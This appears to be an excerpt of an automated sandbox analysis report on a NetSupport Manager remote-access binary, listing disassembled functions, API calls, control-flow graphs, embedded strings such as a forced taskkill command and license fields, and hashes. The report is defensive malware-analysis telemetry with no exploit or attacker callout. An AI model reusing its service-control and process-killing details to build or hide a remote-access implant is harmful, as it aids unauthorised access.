                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00B29D3C
                                                                                                                        • Sleep.KERNELBASE(000001F4), ref: 00B29D47
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,000000E0), ref: 00B29D7B
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B29A88
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                          • Part of subcall function 00AE3DA0: _free.LIBCMT ref: 00AE3DC2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$QueryStatus$CloseHandleSleep$wsprintf$ComputerControlCreateDirectoryEventLocalNameObjectProcessRegisterSingleSourceStartSystemTimeWait_free_mallocwvsprintf
                                                                                                                        • String ID: AllowStop ret %x$Attempt to start the service$CICWClass$Calling %s$NSMWClass$PCIapp$Restarted client32 service after %s$Service is stopped$Service started ok$Service stopped ok$StartService ok$Use old method$Waiting a while until stopped$\net$\taskkill.exe /F /IM client32.exe /IM runplugin.exe /IM runplugin64.exe$client32 control finished$close service$close service manager$crash$done taskkill$start
                                                                                                                        • API String ID: 593964022-1400246591
                                                                                                                        • Opcode ID: be472282571479ff4c98d2ef0427753592875e38a891716d31d34a827a60f3a4
                                                                                                                        • Instruction ID: 3ca9ac2c91a818ea096d2dea1a13161277fae2999f3cf846762610fcc46cc4f9
                                                                                                                        • Opcode Fuzzy Hash: be472282571479ff4c98d2ef0427753592875e38a891716d31d34a827a60f3a4
                                                                                                                        • Instruction Fuzzy Hash: ABB19471D41325ABEB209B64EC86FAA73F8EB54704F0040E5F50DA7192DB74AB85CF62
                                                                                                                        Function 00B26E10 Relevance: 74.1, APIs: 20, Strings: 22, Instructions: 606COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,73AD1CB0,0000001A,?), ref: 00B26F2C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileModuleName
                                                                                                                        • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                                                        • API String ID: 514040917-357498123
                                                                                                                        • Opcode ID: 01f9400025232963b0833bcb388d59f4a89979f5801a1e14d9b68aa9bdd15c9f
                                                                                                                        • Instruction ID: ad89e9a1f89a535b617f484853c90450bee9a7f1e1ba14fa6e3166072181f19e
                                                                                                                        • Opcode Fuzzy Hash: 01f9400025232963b0833bcb388d59f4a89979f5801a1e14d9b68aa9bdd15c9f
                                                                                                                        • Instruction Fuzzy Hash: 5522CCB59842259BCB20AF24EC91BA673F0EF64304F6040D9E90DA7361EF359E85CB95
                                                                                                                        Function 00B29EF0 Relevance: 47.8, APIs: 10, Strings: 17, Instructions: 517COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 972 b29ef0-b29f60 call b38cd0 * 2 977 b29f72-b29f86 call b38cd0 972->977 978 b29f62-b29f70 972->978 979 b29f8a-b29f90 call b39583 977->979 978->979 983 b29f95-b29fa0 979->983 984 b29fa2-b29fb7 call b382b3 983->984 985 b29fb8-b29fca call b22110 983->985 990 b29fd8 985->990 991 b29fcc-b29fcf 985->991 993 b29fda-b29fe2 990->993 991->990 992 b29fd1-b29fd6 991->992 992->993 994 b29fe7-b2a006 call b21e20 993->994 995 b29fe4 993->995 998 b2a0f6-b2a0fb 994->998 999 b2a00c-b2a02b call b38406 994->999 995->994 1000 b2a26f-b2a290 call b38c09 call b382b3 998->1000 1005 b2a069-b2a076 999->1005 1006 b2a02d-b2a033 999->1006 1008 b2a078-b2a07e 1005->1008 1009 b2a08f-b2a095 1005->1009 1006->1005 1010 b2a035-b2a03b 1006->1010 1008->1009 1013 b2a080-b2a086 1008->1013 1014 b2a097-b2a09d 1009->1014 1015 b2a0ae 1009->1015 1010->1005 1011 b2a03d-b2a043 1010->1011 1011->1005 1016 b2a045-b2a04b 1011->1016 1013->1009 1017 b2a088-b2a08d 1013->1017 1018 b2a0a7-b2a0ac 1014->1018 1019 b2a09f-b2a0a5 1014->1019 1020 b2a0b3-b2a0f4 call b26c20 call b21e20 1015->1020 1016->1005 1021 b2a04d-b2a053 1016->1021 1017->1020 1018->1020 1019->1015 1019->1018 1020->998 1029 b2a100-b2a131 call b22020 call b21e20 1020->1029 1021->1005 1024 b2a055-b2a05b 1021->1024 1024->1005 1026 b2a05d-b2a063 1024->1026 1026->1005 1028 b2a26a 1026->1028 1028->1000 1034 b2a137-b2a14a call b383b0 1029->1034 1035 b2a1cc-b2a1dd 1029->1035 1043 b2a151-b2a161 1034->1043 1044 b2a14c-b2a14e 1034->1044 1036 b2a1e5-b2a1ec 1035->1036 1037 b2a1df 1035->1037 1036->1000 1039 b2a1f2-b2a1f9 1036->1039 1037->1036 1041 b2a1fb-b2a1fe 1039->1041 1042 b2a20f-b2a215 1039->1042 1041->1042 1046 b2a200-b2a203 1041->1046 1042->1000 1045 b2a217-b2a21a 1042->1045 1047 b2a163 1043->1047 1048 b2a17c-b2a197 1043->1048 1044->1043 1049 b2a224-b2a227 1045->1049 1050 b2a21c-b2a222 1045->1050 1046->1042 1052 b2a205-b2a208 1046->1052 1053 b2a166-b2a16a 1047->1053 1051 b2a198-b2a1c0 call b26c20 call b21e20 1048->1051 1057 b2a229-b2a22c 1049->1057 1058 b2a22e-b2a234 1049->1058 1050->1000 1050->1049 1051->1034 1072 b2a1c6 1051->1072 1052->1042 1059 b2a20a-b2a20d 1052->1059 1054 b2a170-b2a17a 1053->1054 1055 b2a291-b2a297 1053->1055 1054->1048 1054->1053 1055->1048 1061 b2a29d-b2a2a0 1055->1061 1057->1058 1062 b2a236-b2a239 1057->1062 1058->1000 1058->1062 1059->1042 1059->1045 1061->1048 1064 b2a2a6-b2a2a9 1061->1064 1065 b2a243-b2a246 1062->1065 1066 b2a23b-b2a241 1062->1066 1068 b2a345-b2a354 call b21fc0 1064->1068 1069 b2a2af-b2a2be call b383b0 1064->1069 1070 b2a250-b2a253 1065->1070 1071 b2a248-b2a24e 1065->1071 1066->1000 1066->1065 1082 b2a584-b2a5a0 1068->1082 1083 b2a35a-b2a36c call b21fc0 1068->1083 1080 b2a2c0-b2a2cf call b383b0 1069->1080 1081 b2a2e8-b2a302 call b38cd0 1069->1081 1074 b2a255-b2a25b 1070->1074 1075 b2a25d-b2a260 1070->1075 1071->1000 1071->1070 1072->1035 1074->1000 1074->1075 1075->1028 1078 b2a262-b2a268 1075->1078 1078->1000 1078->1028 1080->1081 1093 b2a2d1-b2a2d3 1080->1093 1091 b2a304-b2a32a call b38cd0 call b39d10 1081->1091 1092 b2a32c-b2a342 call b39d10 1081->1092 1082->1051 1083->1082 1090 b2a372-b2a376 1083->1090 1094 b2a55f-b2a566 1090->1094 1095 b2a37c-b2a38c call b27870 1090->1095 1091->1068 1092->1068 1098 b2a2d6-b2a2df 1093->1098 1094->1082 1101 b2a568-b2a57f 1094->1101 1106 b2a38e-b2a39c call b22000 1095->1106 1107 b2a39f-b2a3af call b27870 1095->1107 1098->1098 1103 b2a2e1-b2a2e5 1098->1103 1101->1051 1103->1081 1106->1107 1113 b2a3c2-b2a3d2 call b27870 1107->1113 1114 b2a3b1-b2a3bf call b22000 1107->1114 1119 b2a3e1-b2a3f1 call b27870 1113->1119 1120 b2a3d4-b2a3dd call b38406 1113->1120 1114->1113 1125 b2a3f3-b2a407 call b27710 1119->1125 1126 b2a40a-b2a41a call b27870 1119->1126 1120->1119 1125->1126 1131 b2a43c-b2a44c call b27870 1126->1131 1132 b2a41c-b2a439 call b27710 1126->1132 1137 b2a44e-b2a45c call b22000 1131->1137 1138 b2a45f-b2a46f call b27870 1131->1138 1132->1131 1137->1138 1143 b2a471-b2a47a call b38406 1138->1143 1144 b2a47e-b2a48e call b27870 1138->1144 1143->1144 1149 b2a490-b2a499 call b38406 1144->1149 1150 b2a49d-b2a4ad call b27870 1144->1150 1149->1150 1155 b2a4af-b2a4b8 call b38406 1150->1155 1156 b2a4bc-b2a4cc call b27870 1150->1156 1155->1156 1161 b2a4db-b2a4eb call b27870 1156->1161 1162 b2a4ce-b2a4d7 call b38406 1156->1162 1167 b2a4fc-b2a50c call b27870 1161->1167 1168 b2a4ed-b2a4f6 call b38406 1161->1168 1162->1161 1173 b2a50e-b2a517 call b38406 1167->1173 1174 b2a51d-b2a52d call b27870 1167->1174 1168->1167 1173->1174 1179 b2a53e-b2a54e call b27870 1174->1179 1180 b2a52f-b2a538 call b38406 1174->1180 1179->1094 1185 b2a550-b2a559 call b38406 1179->1185 1180->1179 1185->1094
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00B29F2C
                                                                                                                        • _memset.LIBCMT ref: 00B29F44
                                                                                                                        • _memset.LIBCMT ref: 00B29F79
                                                                                                                          • Part of subcall function 00B22110: _fseek.LIBCMT ref: 00B22123
                                                                                                                          • Part of subcall function 00B22110: _fseek.LIBCMT ref: 00B22133
                                                                                                                          • Part of subcall function 00B22110: _malloc.LIBCMT ref: 00B22143
                                                                                                                          • Part of subcall function 00B22110: __fread_nolock.LIBCMT ref: 00B22156
                                                                                                                          • Part of subcall function 00B22110: _free.LIBCMT ref: 00B221A1
                                                                                                                          • Part of subcall function 00B22110: _fseek.LIBCMT ref: 00B221AB
                                                                                                                        • _wcschr.LIBCMT ref: 00B2A140
                                                                                                                        • _wcschr.LIBCMT ref: 00B2A2B2
                                                                                                                        • _wcschr.LIBCMT ref: 00B2A2C3
                                                                                                                        • _memset.LIBCMT ref: 00B2A2F3
                                                                                                                        • _memset.LIBCMT ref: 00B2A30C
                                                                                                                        • _memmove.LIBCMT ref: 00B2A322
                                                                                                                        • _memmove.LIBCMT ref: 00B2A33D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$_fseek_wcschr$_memmove$__fread_nolock_free_malloc
                                                                                                                        • String ID: Enforce$_License$api$control_only$d$expiry$free_loader$inactive$licensee$maxslaves$os2$product$quiet$serial_no$shrink_wrap$start$transport
                                                                                                                        • API String ID: 4252023336-3044997468
                                                                                                                        • Opcode ID: 11cc3d7293f86dc6178478f89b30ce66c776c0d919dddaf97d1ad863b8133bee
                                                                                                                        • Instruction ID: 56bf4f3c20b4f9f3794e60e4a066fd79a306fafdd15c2ff9c9d1e5b3a93e5b99
                                                                                                                        • Opcode Fuzzy Hash: 11cc3d7293f86dc6178478f89b30ce66c776c0d919dddaf97d1ad863b8133bee
                                                                                                                        • Instruction Fuzzy Hash: 2F02D6B6D002215BDF20AA64AC46BAB73E8DF55701F0445E5FC0DA7252EE74DE44CBA3
                                                                                                                        Function 00B2E039 Relevance: 28.2, APIs: 6, Strings: 10, Instructions: 152stringCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1217 b2e039 1218 b2e040-b2e054 1217->1218 1218->1218 1219 b2e056-b2e085 call b3ab18 call b2f6d0 1218->1219 1224 b2e087-b2e0d1 GetPrivateProfileStringW lstrcmpiW 1219->1224 1225 b2e0dd-b2e0f4 GetModuleFileNameW 1219->1225 1224->1225 1226 b2e0d3 1224->1226 1227 b2e0f6 GetLastError 1225->1227 1228 b2e0fc-b2e12e call b2f030 * 2 call b26080 1225->1228 1226->1225 1227->1228 1235 b2ef04-b2ef19 call b382b3 1228->1235 1236 b2e134-b2e13f 1228->1236 1237 b2e141-b2e14e 1236->1237 1237->1237 1239 b2e150-b2e16f call b3d09c 1237->1239 1243 b2e170-b2e17a 1239->1243 1243->1243 1244 b2e17c-b2e191 call b2b1f0 1243->1244 1247 b2e193 1244->1247 1248 b2e198-b2e19a 1244->1248 1247->1248 1249 b2e1a0-b2e1a9 1248->1249 1249->1249 1250 b2e1ab-b2e1b2 1249->1250 1251 b2e1b5-b2e1bf 1250->1251 1251->1251 1252 b2e1c1-b2e1ee 1251->1252 1253 b2e1f0-b2e1ff call b383b0 1252->1253 1256 b2e210 1253->1256 1257 b2e201-b2e207 1253->1257 1258 b2e213-b2e220 call b383b0 1256->1258 1257->1258 1259 b2e209-b2e20e 1257->1259 1262 b2e222-b2e228 1258->1262 1263 b2e231 1258->1263 1259->1256 1259->1258 1264 b2e234-b2e238 1262->1264 1265 b2e22a-b2e22f 1262->1265 1263->1264 1266 b2e23a 1264->1266 1267 b2e23c-b2e23f 1264->1267 1265->1263 1265->1264 1266->1267 1268 b2e663-b2e669 1267->1268 1269 b2e245-b2e2b1 call b3a558 1267->1269 1270 b2e66f-b2e676 1268->1270 1271 b2edbd-b2edd1 call b2f030 1268->1271 1297 b2e2b7-b2e2c1 1269->1297 1298 b2e84d-b2e869 Sleep call b24420 1269->1298 1273 b2e688-b2e68d 1270->1273 1274 b2e678-b2e682 GetCurrentDirectoryW 1270->1274 1281 b2edd3-b2ede1 PostMessageW 1271->1281 1282 b2ede7-b2edfc DestroyWindow 1271->1282 1277 b2e690-b2e699 1273->1277 1274->1273 1277->1277 1280 b2e69b-b2e6af 1277->1280 1283 b2e6b1-b2e6b9 1280->1283 1284 b2e6bc-b2e6ec call b278f0 call b2f030 1280->1284 1281->1282 1286 b2ee02-b2ee0f 1282->1286 1287 b2ef27-b2ef37 call b382b3 1282->1287 1283->1284 1284->1271 1303 b2e6f2-b2e70e call b24050 1284->1303 1289 b2ee10-b2ee1d 1286->1289 1289->1289 1292 b2ee1f-b2ee35 call b39583 1289->1292 1304 b2ee37-b2ee48 call b373d1 call b38c09 1292->1304 1305 b2ee4b-b2ee51 1292->1305 1297->1253 1298->1271 1303->1271 1304->1305 1306 b2ee53-b2ee6e Sleep call b2f030 call b24420 1305->1306 1307 b2ee71-b2ee90 call b2f030 call b382b3 1305->1307 1306->1307
                                                                                                                        APIs
                                                                                                                        • GetPrivateProfileStringW.KERNEL32(boot,display.drv,00B6A054,00B90F98,00000400,system.ini), ref: 00B2E0A5
                                                                                                                        • lstrcmpiW.KERNEL32(00B90F98,shellscr.drv), ref: 00B2E0B5
                                                                                                                        • GetModuleFileNameW.KERNEL32(00AE0000,?,00000100), ref: 00B2E0F0
                                                                                                                        • GetLastError.KERNEL32 ref: 00B2E0F6
                                                                                                                        • _wcschr.LIBCMT ref: 00B2E1F3
                                                                                                                        • _wcschr.LIBCMT ref: 00B2E216
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$ErrorFileLastModuleNamePrivateProfileStringlstrcmpi
                                                                                                                        • String ID: NetSupport Manager for Windows (32 bit) V14.10$V14.10$V15.10$boot$display.drv$module=%s$shellscr.drv$system.ini$ver=%s$winexec.ok
                                                                                                                        • API String ID: 127461356-4233989162
                                                                                                                        • Opcode ID: 32aebebb35e1daa7f9f46bad21f0a74572dc6da022cb7724e2532a08d6b2e368
                                                                                                                        • Instruction ID: 3690380a292130ea8c4730619f2ba84f292489088cf0e6c15f030768a0ac6689
                                                                                                                        • Opcode Fuzzy Hash: 32aebebb35e1daa7f9f46bad21f0a74572dc6da022cb7724e2532a08d6b2e368
                                                                                                                        • Instruction Fuzzy Hash: 0B5169729402218BCB30AB29AC56A6A73F1EB44310F1546E5E42E973F1FF70C841C762
                                                                                                                        Function 00B26080 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 219windowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1455 b26080-b260ad GetShortPathNameW 1456 b260b7-b260bf 1455->1456 1457 b260af-b260b5 GetLastError 1455->1457 1458 b260c1-b260ca 1456->1458 1459 b260df-b260f5 call b384df 1456->1459 1457->1456 1460 b260d0-b260dd 1458->1460 1463 b260f7-b2613b wsprintfW MessageBoxW call b382b3 1459->1463 1464 b2613c-b26177 call b25690 call b2f030 * 2 1459->1464 1460->1459 1460->1460 1473 b26180-b26194 1464->1473 1473->1473 1474 b26196-b261ac call b384df 1473->1474 1477 b261ae-b261d4 call b2f030 1474->1477 1478 b2621c-b26228 1474->1478 1477->1478 1487 b261d6-b261d8 1477->1487 1480 b2622a 1478->1480 1481 b2622f-b2623a SetCurrentDirectoryW 1478->1481 1480->1481 1483 b26249-b2624b 1481->1483 1484 b2623c-b26241 call b2f5b0 1481->1484 1486 b26250-b26264 1483->1486 1488 b26246 1484->1488 1486->1486 1489 b26266-b26271 1486->1489 1490 b261e0-b261f4 1487->1490 1488->1483 1491 b26273-b26280 1489->1491 1490->1490 1492 b261f6-b261fe 1490->1492 1491->1491 1493 b26282-b26293 call b3c0c4 1491->1493 1494 b26200-b26209 1492->1494 1498 b26388-b2639c call b382b3 1493->1498 1499 b26299-b262a4 1493->1499 1494->1494 1496 b2620b-b26216 1494->1496 1496->1478 1500 b262a6-b262b3 1499->1500 1500->1500 1503 b262b5-b262c6 call b3c0c4 1500->1503 1506 b262eb-b262f8 1503->1506 1507 b262c8 1503->1507 1508 b26300-b2630d 1506->1508 1509 b262d0-b262e4 1507->1509 1508->1508 1511 b2630f-b26320 call b3c0c4 1508->1511 1509->1509 1510 b262e6 1509->1510 1510->1498 1514 b26322-b26336 1511->1514 1515 b2633a-b26347 1511->1515 1514->1514 1516 b26338 1514->1516 1517 b26350-b2635d 1515->1517 1516->1498 1517->1517 1518 b2635f-b26366 call b3c0c4 1517->1518 1520 b2636b-b26370 1518->1520 1520->1498 1521 b26372-b26386 1520->1521 1521->1498 1521->1521
                                                                                                                        APIs
                                                                                                                        • GetShortPathNameW.KERNELBASE(?,00B8C848,00000100), ref: 00B260A5
                                                                                                                        • GetLastError.KERNEL32 ref: 00B260AF
                                                                                                                          • Part of subcall function 00B25690: GetModuleHandleW.KERNEL32(kernel32,GetLongPathNameW), ref: 00B256E4
                                                                                                                          • Part of subcall function 00B25690: GetProcAddress.KERNEL32(00000000), ref: 00B256EB
                                                                                                                          • Part of subcall function 00B25690: GetLongPathNameW.KERNELBASE(?,?,00000104), ref: 00B256FC
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • wsprintfW.USER32 ref: 00B2610B
                                                                                                                        • MessageBoxW.USER32(00000000,?,NetSupport Manager for Windows (32 bit) V14.10,00000000), ref: 00B26124
                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(C:\Windows\Installer\), ref: 00B26230
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$NamePath$AddressCurrentDirectoryErrorHandleLastLocalLongMessageModuleProcShortTime_mallocwvsprintf
                                                                                                                        • String ID: C:\Windows\Installer\$Fatal Error, cannot continuemodule=<%s>, e1=%d, path=<%s>, e2=%d$IKS.LIC$NST.LIC$NSW.LIC$NetSupport Manager for Windows (32 bit) V14.10$longpath=%s$path=%s
                                                                                                                        • API String ID: 3910602105-2982756972
                                                                                                                        • Opcode ID: b05b4fdc412ddfe4c762544d41f98a085bd38adb063e14e2f1ff28aa6fb324d1
                                                                                                                        • Instruction ID: d49e070717dae847ff6cb8799ae611fcfd4c7d7b0a6ebba7f5fbd01f2b782087
                                                                                                                        • Opcode Fuzzy Hash: b05b4fdc412ddfe4c762544d41f98a085bd38adb063e14e2f1ff28aa6fb324d1
                                                                                                                        • Instruction Fuzzy Hash: B4712071A80325EACB20AB6CAD27B7637E0EF54751F1404E5F80ADB2B2FB749901C365
                                                                                                                        Function 00B2F367 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 61registryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1546 b2f367-b2f36e 1547 b2f370-b2f377 1546->1547 1548 b2f423-b2f43e LeaveCriticalSection call b382b3 1547->1548 1549 b2f37d-b2f38e 1547->1549 1551 b2f390 1549->1551 1552 b2f395-b2f3cf wsprintfW RegOpenKeyExW 1549->1552 1551->1552 1554 b2f3d1-b2f3f9 RegQueryValueExW 1552->1554 1555 b2f419-b2f41d 1552->1555 1556 b2f3fb-b2f407 call b38406 1554->1556 1557 b2f40c-b2f413 RegCloseKey 1554->1557 1555->1547 1555->1548 1556->1557 1557->1555
                                                                                                                        APIs
                                                                                                                        • wsprintfW.USER32 ref: 00B2F3A2
                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,00000000), ref: 00B2F3C5
                                                                                                                        • RegQueryValueExW.ADVAPI32(00000000,Log,00000000,?,?,?), ref: 00B2F3F5
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B2F413
                                                                                                                        • LeaveCriticalSection.KERNEL32(00B9250C), ref: 00B2F428
                                                                                                                        • _fputs.LIBCMT ref: 00B2F4A7
                                                                                                                        • _free.LIBCMT ref: 00B2F4F9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCriticalLeaveOpenQuerySectionValue_fputs_freewsprintf
                                                                                                                        • String ID: @$Log$SOFTWARE\Productive Computer Insight\%s$winst32$winstall
                                                                                                                        • API String ID: 1741332052-2172721721
                                                                                                                        • Opcode ID: b3fa742350b3e463f8a9c64f28193597a89cd569c5e7e0a8af900b5288cab9a8
                                                                                                                        • Instruction ID: 8f57c03ee9ca4319da563775e17535c5053d289f11e4092ed842ba2f4eff7717
                                                                                                                        • Opcode Fuzzy Hash: b3fa742350b3e463f8a9c64f28193597a89cd569c5e7e0a8af900b5288cab9a8
                                                                                                                        • Instruction Fuzzy Hash: 0B1163B2D00218ABDB24DB54EC95BEE73F8EB44704F1041E9E50D97181DBB55A84CF95
                                                                                                                        Function 00B15A70 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 110sleepsynchronizationCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
